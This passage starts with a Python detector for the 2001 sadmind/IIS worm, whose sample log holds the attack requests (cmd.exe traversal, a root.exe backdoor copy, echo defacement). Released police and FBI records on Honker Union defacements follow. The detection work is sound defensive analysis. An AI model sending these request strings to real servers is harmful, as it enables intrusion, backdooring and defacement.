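# Defacement step: "echo <html...> > ../index.asp" run through root.exe.
# (?<!\^)> skips the caret-escaped ^> that appears inside the echoed tags.
DEFACE_RE = re.compile(r"echo.*(?<!\^)>.*(index|default)\.(asp|htm)$", re.I)
# Backdoor step: cmd.exe copied into the scripts directory as root.exe.
COPY_RE = re.compile(r"\bcopy\b.*cmd\.exe.*root\.exe", re.I)


@dataclass
class Hit:
    client_ip: str
    when: str
    status: str
    uri: str
    indicators: list = field(default_factory=list)


def parse_line(line):
    """Split one IIS log line into a dict; None for lines that are not records."""
    parts = line.strip().split(", ")
    if len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts[: len(FIELDS) - 1]))
    # The query is the last field; rejoin anything a ", " inside it split off.
    rec["query"] = ", ".join(parts[len(FIELDS) - 1:]).rstrip(",")
    return rec


def classify(rec):
    """Return the worm indicators present in one parsed request."""
    # Decode %XX once and unify slashes so ..%5c and ..\ traversal variants are
    # caught too (a generalisation beyond the literal requests in the record).
    stem = unquote(rec["uri_stem"]).replace("\\", "/").lower()
    query = unquote(rec["query"]).replace("\\", "/").lower()
    found = []
    if "/../" in stem and stem.endswith("cmd.exe"):
        found.append("traversal-to-cmd.exe")   # /scripts/../../winnt/system32/cmd.exe
    if stem.endswith("/root.exe"):
        found.append("root.exe-invoked")        # the renamed cmd.exe used as a backdoor
    if COPY_RE.search(query):
        found.append("cmd.exe-copied-to-root.exe")
    if DEFACE_RE.search(query):
        found.append("echo-defacement")
    return found


def scan(log_text):
    """Run classify() over every line and keep only the flagged requests."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        inds = classify(rec)
        if inds:
            hits.append(Hit(rec["client_ip"], rec["date"] + " " + rec["time"],
                            rec["status"], rec["uri_stem"], inds))
    return hits


def sources(hits):
    """Map each client IP to the sorted indicators seen from it: the FD-71
    'originating IP' answered from the log rather than by hand."""
    out = {}
    for h in hits:
        out.setdefault(h.client_ip, set()).update(h.indicators)
    return {ip: sorted(v) for ip, v in out.items()}


# Constructed sample modelled on the record; documentation addresses only.
SAMPLE_LOG = """\
198.51.100.7, -, 5/7/01, 12:14:08, W3SVC1, CSM SERVER, 192.168.2.150, 10, 387, 11466, 200, 0, GET, /DEFAULT.ASP, -,
192.0.2.10, -, 5/7/01, 12:20:26, W3SVC1, CSM SERVER, 192.168.2.150, 110, 66, 813, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
192.0.2.10, -, 5/7/01, 12:20:29, W3SVC1, CSM SERVER, 192.168.2.150, 110, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\\winnt\\system32\\cmd.exe+root.exe,
192.0.2.10, -, 5/7/01, 12:20:34, W3SVC1, CSM SERVER, 192.168.2.150, 30, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>^<body+bgcolor%3Dblack^>defaced^</html^>>.././index.asp,
192.0.2.10, -, 5/7/01, 12:20:34, W3SVC1, CSM SERVER, 192.168.2.150, 30, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>^<body+bgcolor%3Dblack^>defaced^</html^>>.././index.htm,
198.51.100.7, -, 5/7/01, 12:45:54, W3SVC1, CSM SERVER, 192.168.2.150, 90, 305, 11574, 200, 0, GET, /DEFAULT.ASP, -,
garbage line that is not a log record
"""

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h.when, h.client_ip, h.status, h.uri, ",".join(h.indicators))
    print(sources(hits))
```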


Bismarck Police Department 
BISMARCK, NORTH DAKOTA 58504 


REPORT


TYPE OF OFFENSE: Computer Fraud
VICTIM: Schumacher's Diamond Cutters
SUBJECT(S):


On 05-07-01 at 0934 hrs I was dispatched to Schumacher's Diamond Cutters, 714 S 2nd, for a computer fraud report. On scene I met with subject/witnesses #1 and #2, [redacted], ex-employees of Schumacher's Diamond Cutters. They stated that they still do contract work for [redacted] at this time. They stated that they all own their own businesses located in Mandan. They stated that this morning when they went in to view the websites that are on a server [redacted] of business, the website appeared to have been hacked.
b7C


At this time we went and looked at the first computer site, Schumacherdiamond.com. When this website was entered the standard web page did not appear, but a black page with red writing on it appeared. The red writing stated "fuck USA Government", "fuck PoizonBOx", "contact:sysadmcn@yahoo.com.cn".


When I went to the address "sysadmcn@yahoo.com.cn", I received a yahoo page out of China Yahoo. It was two pages long and the entire pages were written in Chinese. This is attached to the original report as B-1 and B-2.


I asked [redacted] how many different websites are on the server. They provided a list of websites that are on the server that were hit by these hackers. There are five different websites that are listed with the report. When you go to them, you receive this same black screen with the red letters. There was only one website within the server that was not tampered with.
b6
b7C


The computer belongs to Schumacher's Diamond Cutters. The [redacted] of Schumacher's Diamond Cutters is [redacted]. [Redacted] did come to the business once I started taking the report. He was aware of the problem.
b6
b7C


A timeline was established by [redacted]. He stated that the last time he was on the computer was Sunday night, 05-06-01, at approximately 1600 hours, and the website was fine. He stated that this morning, 05-07-01, at 0800 hours, the website had been hacked. He believes that whoever was in the computer was possibly in it at the time that he logged in. It is unsure to me why he believes this.


The FBI was contacted and I spoke with FBI Agent [redacted]. After explaining to Helm that we believed that the computer had been hacked by subjects in China, he stated that he would be over to view the computer. He also contacted FBI specialists in Minneapolis, and he believed that they would be doing follow-up on the case.


b6 


b7C 
05-07-01
Investigating Officer
BPD Form 301
Rev 8/2000
Page 1 of 1
[Defacement screenshot] contact: sysadmcn@yahoo.com.cn


http://www.schumacherdiamond.com/ 05/07/2001 
FEDERAL BUREAU OF INVESTIGATION




Precedence: ROUTINE Date: 05/24/2001 


To: Chicago Attn: SA
Counterterrorism SSA


From: Dallas 
Security 


Contact: x2386
Approved By: 
Drafted By: 
Case ID #: (Pending)


Title:  HACKER/HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report complaint received at Dallas Division regarding a web page defacement by unknown individual coming from a Chinese Internet Protocol (IP) address.


Enclosure(s): FD-71 (complaint form) completed by [redacted]; diskette containing IIS logs, defacement and WatchGuard alert, provided by GAPRS via e-mail, regarding the computer compromise of the GAPRS web server.


Details: On 05/23/2001, writer was telephonically contacted by [redacted] with Greet America Public Record Services (GAPRS), located at 8035 E. R L Thorton Freeway, Dallas, Texas, telephone number [redacted]. [Redacted] advised writer that on 5/21/2001 GAPRS' web server was compromised by unknown individuals coming from the IP address 202.118.7.199.


A trace route conducted by [redacted] to the IP address revealed that it resolved back to Beijing. After gaining access to the web server, which was running Windows NT IIS 4.0, the intruders defaced the company's internal web site, research.gaprs.com. The customer site www.grprs.com was not defaced. The defacement contained the statement "fuck USA Government fuck PoizonBOx, contact:sysadmcn@yahoo.com.cn."


[Redacted] estimated that the damage to GAPRS was between $500-$1000.


[Redacted] stated he would e-mail the IIS logs and the defacement. Since other GAPRS' computers were not within the DMZ, they were not compromised.


b6 
b7C 
b7E 


b6 
b7C 




To: Chicago From: Dallas
Re: 05/24/2001


Dallas Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 


b3 
b7E 


b6 
b7C 
b7E 




To: Chicago From: Dallas
Re: 05/24/2001


LEAD(s): 
Set Lead 1: 
CHICAGO 


AT CHICAGO, IL 


Take action deemed appropriate. 
Set Lead 2: 
COUNTERTERRORISM 
AT WASHINGTON, DC 


Read and clear. 




b3 
b7E 


FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative  See below 


Subject's name and aliases: [ ] 
Character of case: [ ] 

Complainant: [ ]  Protect Source 
Greet America Public Record Services (GAPRS) 

Complaint received: [ ] Personal [X] Telephonic  Date 05/23/2001  Time [ ] am 


Address of Subject: 

Complainant's address and telephone number: 
8035 E. R L Thorton Frwy 
Dallas, TX 75228  (214) 320-9836 

Complainant's DOB:   Sex: Male 

Scars, marks and other data: Originating IP 202.118.7.199 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint 


Complainant advised that on 5/21/2001 GAPRS' web server was 
compromised by unknown individuals coming from the IP address 
202.118.7.199. A trace route conducted by [ ] to the IP address 
revealed that it resolved back to Beijing. After gaining access to the 
web server, which was running Windows NT IIS 4.0, the intruders defaced 
the company's internal web site, research.gaprs.com. The customer site 
www.grprs.com was not defaced. The defacement contained the statement 
"fuck USA Government fuck PoizonBOx, contact:sysadmcn@yahoo.com.cn." 

[ ] estimated that the damage to GAPRS was between $500-$1000. 
[ ] stated he would e-mail the IIS logs and the defacement. Since other 
GAPRS' computers were not within the DMZ, they were not compromised. 


Do not write in this space. 


BLOCK STAMP 




http://www.network-tools.com/default.asp?prog=Express&servlook=209.237.160.161&hops=2  5/24/01 



Reverse Lookup Result: www.nams.com.cn. 


TraceRoute to 202.118.7.199 [www.nams.com.cn] 

Hop  (ms) (ms) (ms)  IP Address       Host name 
  1    0    0    0   209.237.131.3 
  2    0   15    0   157.130.73.121   serial4-1-1.9w1.orl1.alter.net 
  3   31   16   16   152.63.84.46     504.at-2-1-0.xr2.atl1.alter.net 
  4   31   16   15   152.63.10.77     0.so-3-0-0.tr2.atl1.alter.net 
  5   31   32   47   146.188.141.62   109.at-5-0-0.tr2.dca6.alter.net 
  6   31   31   47   152.63.11.90     0.so-3-0-0.XR2.DCA6.ALTER.NET 
  7   47   32        152.63.38.89     0.so-2-1-0.XL2.DCA6.ALTER.NET 
  8    *   31   32   152.63.38.137    POS7-0.BR2.DCA6.ALTER.NET 
  9   31   31   47   137.39.52.166 
 10   31   31   47   207.45.223.121   if-4-0.core1.Washington.Teleglobe.net 
 11   47   31   47   64.86.83.161     if-4-0.core3.NewYork.Teleglobe.net 
 12   94   94   93   64.86.83.174     if-8-0.core2.LosAngeles.Teleglobe.net 
 13   94   78   78   64.86.83.146     if-6-0.core2.LosAngeles2.Teleglobe.net 
 14   78   78   94   64.86.80.38      if-0-0-0.bb1.LosAngeles2.Teleglobe.net 
Traceroute, Ping, Domain Name Server (DNS) Lookup, WHOIS, DNS Records Lookup, an Page 1 of 3 




 15   78   93   79   64.86.173.34 
 16  235  250  235   202.112.61.21 
 17  235  250  234   202.112.36.132 
 18  234  235  250   202.112.36.242 
 19  234  250  235   202.112.1.62 
 20  250  234  266   202.112.1.193    beijing-bgw1-lan.cernet.net 
 21  250  234  250   202.112.1.134    xian-bgw2-lan.cernet.net 
 22  766  781  766   202.112.1.122 
 23  765  782  765   202.112.1.185    beijing-bgw4-sat.cernet.net 
 24  766  781  766   202.112.1.94     shenyang-rgw-lan.cernet.net 
 25  781  781  782   202.112.29.73    Sy-rgw.synet.edu.cn 
 26  781  782  781   202.112.29.199 
 27  797  781  782   202.112.31.225 
 28  781  797  765   202.118.4.225    router-4500.neusoft.com.cn 
 29  797  765  782   202.118.7.199    www.nams.com.cn 


Trace complete 
Reverse Lookup Result: www.nams.com.cn 


Lookup Result: 0.0.0.0 
China Whois web interface contacted: http://www.cnnic.cn/cgi-bin/domainac 


DNS records for: com.cn 




Answer records 

com.cn  1  NS   sld-ns1.cnnic.net.cn  86400s 
com.cn  1  NS   sns.cernet.net        86400s 
com.cn  1  NS   sld-ns2.cnnic.net.cn  86400s 
com.cn  1  SOA  server: ns.cnc.ac.cn 
                email: hostmaster@ns.cnc.ac.cn 
                serial: 2001052406 
                refresh: 21600 
                retry: 7200 
                expire: 3600000 
                minimum ttl: 86400    86400s 

Authority records 

Additional records 

sld-ns1.cnnic.net.cn  1  A  159.226.1.3    86214s 
sld-ns2.cnnic.net.cn  1  A  202.97.16.197  86214s 

DNS records for: nams.com.cn 

DNS query for nams.com.cn failed: Queried domain does not exist 


FD-801 (Rev. 7-15-97) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE  Date: 05/21/2001 

To: Counterterrorism  Attn: NIPC/CIOS/CIU 
                            Room 5965 ETG 

From: SAC, Newark 
Approved By: 
Drafted By: 


Case ID #: 


Title: UNSUB(s); 
NOVO NETWORKS - Victim; 


SUBMISSION: [ ] Initial [ ] Supplemental [X] Closed 
CASE OPENED: 
CASE CLOSED: 5/15/01 

[ ] No action due to state/local prosecution (Name/Number: ) 
[X] USA declination 
[ ] Referred to Another Federal Agency (Name/Number: ) 
[ ] Placed in unaddressed work 
[ ] Closed administratively 
[ ] Conviction 

COORDINATION: FBI Field Office NEWARK 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: NOVO Networks 
Address/location: 1 Evertrust Plaza, Jersey City, NJ, telephone (201) 200-5515 x[ ] 
Purpose of System: Internet connectivity and long distance telephone pre-paid calling cards 
Highest classification of information stored in system: 

System Data: 
Hardware/configuration (CPU): Sun Solaris 
Operating System: SunOS 
Software: 

Security Features: 
Security Software Installed: [ ] yes (identify ) [ ] no 
Logon Warning Banner: [ ] yes [ ] no 




INTRUSION INFORMATION 


Access for intrusion: [ ] Internet connection [ ] dial-up number [ ] LAN (insider) 


Method: 


Internet address: 
Network name: 


Technique(s) used in intrusion: 
Path of intrusion: 


Subject: UNSUB(s) 


addresses: 1. 2. 3. 4, 5. 
country: 1. 2. 3. 4. 5. 

facility: 1. 2. 3. 4. 5. 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 
Group Affiliation: 

Employer: 

Known Accomplices: 

Equipment used: 


Hardware/configuration (CPU): 
Operating System: 


Software: 
Impact: 
Compromise of classified information: [ ] yes [X] no 
Estimated number of computers affected: one (1) 
Estimated dollar loss to date: Unknown 

Category of Crime: 
Impairment:                                 Theft of Information: 
[ ] Malicious code inserted                 [ ] Classified information compromised 
[ ] Denial of service                       [ ] Unclassified information compromised 
[ ] Destruction of information/software     [ ] Passwords obtained 
[ ] Modification of information/software    [ ] Computer processing time obtained 
                                            [X] Telephone services obtained 
                                            [ ] Application software obtained 
                                            [ ] Operating software obtained 
Intrusion: 
[ ] Unauthorized access 
[ ] Exceeding authorized access 




REMARKS 


[ ] of NovoNetworks, 1 Evertrust Plaza, 8th Floor, Jersey City, New Jersey, (201) 200-5515, said that his company provides Internet bandwidth and prepaid calling card services. 


On or about 5/5/01, their Sun system was compromised by the Sad Mind Worm. [ ] removed the components of the worm, but feels that information has been stolen from the system. [ ] believes that an unknown number of prepaid calling card PINs were taken because there has been an increased number of invalid authorizations being reported. [ ] explained that there are in excess of 70 1-800 telephone numbers that are associated with specific prepaid cards, and if a prepaid card number is entered and the wrong 1-800 number was dialed, an exception report is generated. [ ] is not sure which numbers were compromised, and the system does not track calls completed. Therefore, he is not able to determine the extent of the damage. 


[ ] has various logs and IP addresses since May 5th, but does not have any surrounding the actual incident and does not have any information about the compromise. [ ] does have IP addresses for individuals who are ftp'ing to his site and ftp'ing elsewhere. [ ] has not patched his system, but is currently having a mirror drive prepared from backup to replace the compromised drive. [ ] is also having his telephone switch vendor, Siemens, track the originating telephone numbers for the error log. [ ] is also seeing an increase in usage in older products, leading him to believe that a compromise occurred, but he does not have any specific details. 


According to Siemens, the telephone calls are originating from Italy, Taiwan, California and Louisiana State Govt's. The IP addresses identified by [ ] (possibly spoofed) are: 
206.142.142.4 - LeapFrog Technology, Abilene, TX 
217.83.228.217 - Deutsche Telekom, Germany 
62.163.234.170 - Chello, The Netherlands 
64.229.80.183 - Unassigned RIPE.net address 
213.22.76.23 - TVCABO, Portugal Cable Modem 


[ ] had contacted Jersey City Police, who put him in contact with NJUSP High Tech Crimes Unit, and has not received a response. [ ] was told by the FBI that they should consider patching the server exploit, cancelling all possible PINs to alleviate the amount of losses and continue monitoring the situation, because the USAO has declined prosecution. 




Technology(s) Used: 

Top Screen                         Secondary Screen 
Protocol Attacks: 
[X] IP                             [X] spoofing attack 
                                   [ ] source routing 
[ ] TCP                            [ ] sequence number attack 
[ ] UDP                            [ ] spoofing attack 
                                   [ ] flooding 
[X] FTP                            [X] vulnerable version 
                                   [ ] SITE EXEC 
                                   [ ] overload FTP buffer 
                                   [ ] anonymous FTP 
[ ] TFTP 
[ ] Telnet                         [ ] hijacking 
                                   [ ] packet sniffing 
[ ] r commands                     [ ] rsh 
                                   [ ] rlogin 
[ ] SMTP                           [ ] vulnerable version 
                                   [ ] spoofing 
                                   [ ] embedded postscript attack 
                                   [ ] trojan horse attack 
                                   [ ] syslog attack 
                                   [ ] flooding 
                                   [ ] MIME 
[ ] HTTP                           [ ] flooding 
                                   [ ] Telnet to HTTP port 
                                   [ ] gopher 




Top Screen 
Protocol Attacks: 
[ ] X11 window 
[ ] DNS 
[ ] SNMP 
[ ] FSP 
[ ] NFS 

Other Attacks: 
[ ] Worm 
[ ] Social engineering 
[ ] Scavenging and reusing 
[ ] Masquerading 
[ ] Scanning 
[ ] Trojan Horse 
[ ] Other 

Secondary Screen 
[ ] vulnerable version 
[ ] flooding 


FD-71 (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [X] Negative [ ] See below 


Subject's name and aliases: UNSUB 
Character of case: Computer Hacking 

Complainant: [ ]  Protect Source 
NOVO Networks 

Complaint received: [ ] Personal [X] Telephonic  Date 05/15/2001  Time am 

Address of Subject: 

Complainant's address and telephone number: 
1 Evertrust Plaza, Jersey City, NJ 
(201) 200-5515 x[ ] 




Scars, marks and other data 


Employer Address Telephone 


Subject's 
Description 


Vehicle Description 


Facts of Complaint 


Approximately two days ago, company computers attacked by a "worm." 
Subsequently, company's IP address was used to attack outside sites. 
Confidential list of PIN's has been published on the Internet. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 




U.S. Department of Justice 


Federal Bureau of Investigation 
File No. 
Legal Liaison Office 


26 Garden Road 
Hong Kong, SAR 
Tel: (852) 2841-2348 
Fax: (852) 2522-6843 


May 30, 2001 


Interpol NCB 

Ministry of Public Security 
14 Dong Chang An Street 
Beijing, China 

Via Fax 86-10-6512-5804 


Re | HACKER/HONKER UNION OF CHINA 
Your Ref: New Request for Assistance 


Dear Sir/Madam, 
On May 22, 2001, my Chicago Office advised: 


"Chicago Division of the FBI is the lead office for the criminal investigation of the 
Honkers Union of China, sometimes called the Hackers Union of China, specifically, actions 
against United States Web sites originating out of China. Also, as a part of this investigation, 
United States based groups carrying out actions against Web sites originating out of China are 
being investigated. 


. "The attacks have taken the form of denial of service attacks, installation of the Adore 
worm and Web page defacements. Attacks have been reported in Chicago, Washington, D.C., 
San Francisco, and Portland, Oregon." (End of text of letter from Chicago) 


May I request that you provide any information regarding any of the activities detailed 
above. 


Your assistance is sincerely appreciated. 



Legal Liaison Officer 


This report is the property of the Federal Bureau of Investigation. It is being provided to you for background information 
only. It is not to be disseminated outside your agency without the explicit consent of the FBI. 


(Rev. 08-28-2000) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE  Date: 05/29/2001 

To: Counterterrorism  Attn: CIU, CIOS, NIPC, Rm. 5965 
                      Attn: SSA [ ] 
                      Attn: SA [ ] 
                            Squad IP/C 

From: Cincinnati 
      Squad 4 

Contact: SA [ ], 513-562-5741 

Approved By: 
Drafted By: 
Case ID #: [ ] (Pending) 


Title:  HACKER/HONKER UNION OF CHINA 
ILLINOIS SECRETARY OF STATE - VICTIM; 
INTRUSION 
04/03/2001 


Synopsis: Serial [ ], Lead #1, covered. 


Details: For information of recipients, the Cincinnati Division 
recently executed a search warrant on a subject who stole 
computer passwords from a shareholder account in New York, New 
York. 


During the interview, the subject admitted to defacing 
approximately six Chinese web sites. This subject, whose name 
will remain protected, advised that he is a member of the hacker 
group known to deface Chinese web sites. Upon the subject's 
sentencing date, this subject has agreed to cooperate with the 
Cincinnati Division and will be utilized as a confidential source 
targeting unauthorized computer intrusion matters. 


Subsequent to an "official" debriefing of this subject, 
Cincinnati Division will share the information concerning 
captioned matter with the Chicago Division. 


"nc 


b3 
b6 
b7C 
b7E 


b3 
b7E 


To: i i From: Cincinnati 
Re: 05/29/2001 


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO, IL 


Read and Clear. 


FEDERAL BUREAU OF INVESTIGATION 

Precedence: ROUTINE  Date: 05/30/2000 

To: Counterterrorism  Attn: Computer Investigations Unit, Room 5965 
                            National Infrastructure Protection Center (NIPC) 

From: St. Louis 
Approved By: 
Drafted By: 
Case ID #: 

Title: Subject: HONKER UNION OF CHINA; 
Victim: ST. LOUIS BRIDGE COMPANY 
Type: COMPUTER INTRUSION 
Date: March 24, 2001 

SUBMISSION: [X] Initial [ ] Supplemental [ ] Closed 
CASE OPENED: 05/17/2001 
CASE CLOSED: 05/30/2001 (Referred to Chicago Division) 

[ ] No action due to state/local prosecution (Name/Number: ) 
[ ] USA declination 
[ ] Referred to Another Federal Agency (Name/Number: ) 
[ ] Placed in unaddressed work 
[X] Closed administratively 
[ ] Conviction 

COORDINATION: FBI Field Office St. Louis 
Government Agency 
Private Corporation 

VICTIM 

Company name/Government agency: St. Louis Bridge Company 
Address/location: 655 Landmark Drive, Arnold, MO 63010 
Purpose of System: Network System, Intranet, Banking Info Software 
Highest classification of information stored in system: 


System Data: 
Hardware/configuration (CPU): Intel Pentium II 450 (Generic) 
Operating System: Windows NT 4.0 SP 6 
Software: PC Banking from Cass Bank, St. Louis, MO 

Security Features: 
Security Software Installed: [X] yes (identify: Ascend) [ ] no 
Logon Warning Banner: [ ] yes [X] no 


INTRUSION INFORMATION 


Access for intrusion: [ ] Internet connection [ ] dial-up number [ ] LAN (insider) 
If Internet: Internet address: 216.87.60.106 (server accessed) 
Network name: 

Method: 
Technique(s) used in intrusion: FTP (list provided) 
Path of intrusion: 
addresses: 1.  2.  3. 
country:   1.  2.  3. 
facility:  1.  2.  3. 
Subject: 

Age: Race: 

Sex: Education: 

Alias(s): [ ]  Motive: 

Group Affiliation: _HONKER UNION OF CHINA 

Employer: 

Known Accomplices: 

Equipment used: 

Hardware/configuration (CPU): 

Operating System: 

Software: 
Impact: 


Compromise of classified information: [ ] yes [X] no 
Estimated number of computers affected: 1 SERVER 
Estimated dollar loss to date: 


Category of Crime: 
Impairment:                                 Theft of Information: 
[ ] Malicious code inserted                 [ ] Classified information compromised 
[ ] Denial of service                       [ ] Unclassified information compromised 
[X] Destruction of information/software     [ ] Passwords obtained 
[ ] Modification of information/software    [ ] Computer processing time obtained 
                                            [ ] Telephone services obtained 
                                            [ ] Application software obtained 
                                            [ ] Operating software obtained 
Intrusion: 
[X] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


On May 14, 2001, the St. Louis Division received a fax 
from NIPC Watch about a computer intrusion at St. Louis Bridge 
Company. The St. Louis Bridge Company had submitted an incident 
report on the same date to NIPC. The Point of Contact was [ ], 
telephone number [ ]. 


On Ma[ ], St. Louis Division, met with St. Louis Bridge 
Company. [ ] advised that one of the company's servers had 
been attacked on March 24, April 07, May 05, 2001, and May 14, 
2001. 


The attackers used the Sadmind/IIS worm to deface the 
company's intranet website, possibly through the FTP utility. 
[ ] has a firewall, security auditing tools, and secure remote 
access/authorization tools installed on the system. 


The system contains banking information, bidding 
documents, and employee data (names, addresses, telephone numbers). 
The entire internal employee website was destroyed. The main 
server crashed and an attempt to destroy the hard drive was made. 
Log files had been reviewed by [ ]. The user accounts to 
access the system had been deleted. [ ] had brought the network 
intrusion evaluation software back online. 


[ ] provided some IP addresses, dates and their 
intended purpose. [ ] was able to trace these IP addresses to 
China: 

05/05/01  202.97.205.4    Ran scripts 
05/02/01  210.83.109.119  Ran cmd.exe scripts 
05/02/01  62.226.241.1    Caused crash 
05/02/01  202.108.18.5    Looking for passwds 
05/04/01  211.159.23.170  Ran scripts 

[ ] discovered that the attackers had placed a 
backdoor program called "Kaitenz" on his system. [ ] had used 
a backup tape to recover the server. The backup caused some data 
to be lost. 


[ ] had drafted a letter explaining the incident and 
included it with the Incident Report to NIPC. [ ] provided SA 
[ ] with a Zip disk containing the logs of the attacks, the 
letter he sent to NIPC and the hacker tools used in the attack on 
his system. [ ] also provided his Whois queries of the IP 
addresses through www.apnic.net. 


The letter that [ ] drafted is attached to this 
document. 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/30/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis 
Approved By: 
Drafted By: 

Title: Subject: HONKER UNION OF CHINA 
Victim: Electranet USA 
Type: Computer Intrusion 
Date: May 05, 2001 


SUBMISSION: [X] Initial [ ] Supplemental [ ] Closed 
CASE OPENED: 05/10/2001 
CASE CLOSED: 05/30/2001 (Referred to Chicago Division) 

[ ] No action due to state/local prosecution (Name/Number: ) 
[ ] USA declination 
[ ] Referred to Another Federal Agency (Name/Number: ) 
[ ] Placed in unaddressed work 
[X] Closed administratively 
[ ] Conviction 

COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: Electranet USA, Electric Man Internet Services 
Address/location: 754 Longlane Road, New Lenox, Illinois 60451 
Purpose of System: Web Host Server 
Highest classification of information stored in system: 




System Data: 
Hardware/configuration: (Main Server) Compaq ProLiant ML 370, Pentium III, 866 MHz; (Test Server) IBM clone, Pentium III 
Operating System: Windows 2000 Advanced Server 
Software: 

Security Features: 
Security Software Installed: [ ] yes (identify ) [X] no 
Logon Warning Banner: [ ] yes [X] no 


INTRUSION INFORMATION 


Access for intrusion: [X] Internet connection [ ] dial-up number [ ] LAN (insider) 
If Internet: Internet address: 64.37.99.219 
Network name: www.jumponthebus.com 

Method: 
Technique(s) used in intrusion: IIS Exploit (list provided) 
Path of intrusion: 
addresses: 1.        2.  3. 
country:   1. CHINA  2.  3. 
facility:  1.        2.  3. 
Subject: 

Age: Race: 

Sex:: Education: 

Alias(s): [ ]  Motive: 

Group Affiliation: HONKER UNION OF CHINA 

Employer: 

Known Accomplices: 

Equipment used: 

Hardware/configuration (CPU): 

Operating System: 

Software: 
Impact: 


Compromise of classified information: [ ] yes [X] no 
Estimated number of computers affected: 2 Servers 
Estimated dollar loss to date: $28,216 


Category of Crime: 
Impairment:                                 Theft of Information: 
[ ] Malicious code inserted                 [ ] Classified information compromised 
[ ] Denial of service                       [ ] Unclassified information compromised 
[X] Destruction of information/software     [ ] Passwords obtained 
[X] Modification of information/software    [ ] Computer processing time obtained 
                                            [ ] Telephone services obtained 
                                            [ ] Application software obtained 
                                            [ ] Operating software obtained 
Intrusion: 
[X] Unauthorized access 
[ ] Exceeding authorized access 


REMARKS 


On May 6, 2001, [ ] of Electranet USA 
telephonically contacted the St. Louis Division to report an 
intrusion into his computer network system server. SA [ ] 
telephonically contacted [ ], who lived in New Lenox, Illinois, 
and scheduled an interview in St. Louis on May 10, 2001. 


On May 10, 2001, [ ] contacted [ ] at 
Cybercon Data Center, 210 North Tucker, St. Louis, Missouri, 
where [ ] had his two servers stored. [ ] advised that he 
was a self-taught web page designer, who started his own web host 
development business in August of 2000. 


[ ] previously worked for an Internet Service 
Provider which closed. [ ] decided to open his own ISP and 
recruit some of the customers from his former employer. 
[ ] had approximately fifty-three customers at the time of the 
attack. 


[ ] discovered that his main server had been attacked 
on May 6, 2001. The intrusion was a web defacement which 
contained the Chinese flag, music (believed to be the Chinese 
national anthem), and a message about President Bush being a 
murderer. [ ] had saved the web defacements, but was unable to 
retrieve any logs of the attackers' activity on his server. 


On May 7, 2001, [ ] was working remotely with his 
development and testing server and stopped to run an errand. 
Upon [ ] return he discovered that this server had been 
attacked. This attack was a web defacement with a message about 
the USA and PoizonBOx. [ ] disconnected his servers from the 
Internet after the second attack. 


The attacker(s) had deleted passwords, which denied 
[ ] and other users access to the servers. The attacker(s) had 
deleted the service logs and event logs and had created new 
directories with names like "fuckyou". 


An executable file called "sr.exe" was found on the server. 
The reboot file had also been deleted by the attacker(s). [ ] 
was concerned how the attacker(s) were able to gain system level 
access without using passwords. 


[ ] provided SA [ ] with some handwritten notes which 
listed the files deleted, passwords to each server, and estimated 
monetary damage to his business. 


SA [ ] recovered both of [ ] servers for a CART 
examination, but after discussing this with the Chicago Division, SA 
[ ] decided against the exams. The two servers were returned to 
[ ] on 05/18/2001. 
Since [ ] had written all the code for the web pages 
himself, he was able to reload the code and begin cleaning up his 
servers from the attacks. 


There are no logs for examination in this case. 


(Rev. 10-01-1999) 

FEDERAL BUREAU OF INVESTIGATION 

Precedence: ROUTINE  Date: 05/23/2001 


From: Salt Lake City 
C-6 


Approved By: 


Drafted By: 


Title: HACKER/HONKER UNION OF CHINA; 
ILLINOIS SECRETARY OF STATE-VICTIM 
INTRUSION 
04/03/2001 


Synopsis: Report Salt Lake City Web Page Defacements. 


Enclosure(s): Enclosed for receiving office, copies of FD-71 
complaints, NIPC reports, and victim Log files concerning Web 
Page defacements. 


Details: During the week of May 7, 2001, several entities in the 
Salt Lake City area suffered identical Web page defacements. The 
web page defacements contained identical anti-US 
language and disparaging remarks about the PoizonBOx virus. 


The following is a list of the currently known victim 
entities, located in the Salt Lake City area, and their currently 
available contact information. 

[ ] Network, [ ] 

Utah State Administrative Services, [ ] 

National Association of Health Data Organizations, [ ] 

MAY 23 2001  FBI - SALT LAKE 




AtMedica, [ ]. Firewall logs indicate that attacks originated from 
Taiwan, Australia and Brazil. 

[ ] company, [ ], S State Street, SLC, UT. 

HHCube Software Technologies, L.L.C., 4822 South Nancy Drive, South Ogden, UT 84403. 
Firewall logs of this intrusion are enclosed and 
damage from the defacement was estimated at approximately 
$10,000. 

[ ], private business owner. Logs of the attack are enclosed. 

[ ] Health Syst[ ], [ ], Salt Lake City, UT 84109, [ ] 

Miles City, Montana, [ ], 1604 Main [ ], Miles City, MT 59301, 
www.ravenwerks.com. No logs were kept of the intrusion, but 
[ ] estimated that the damage amounted to roughly $500. 

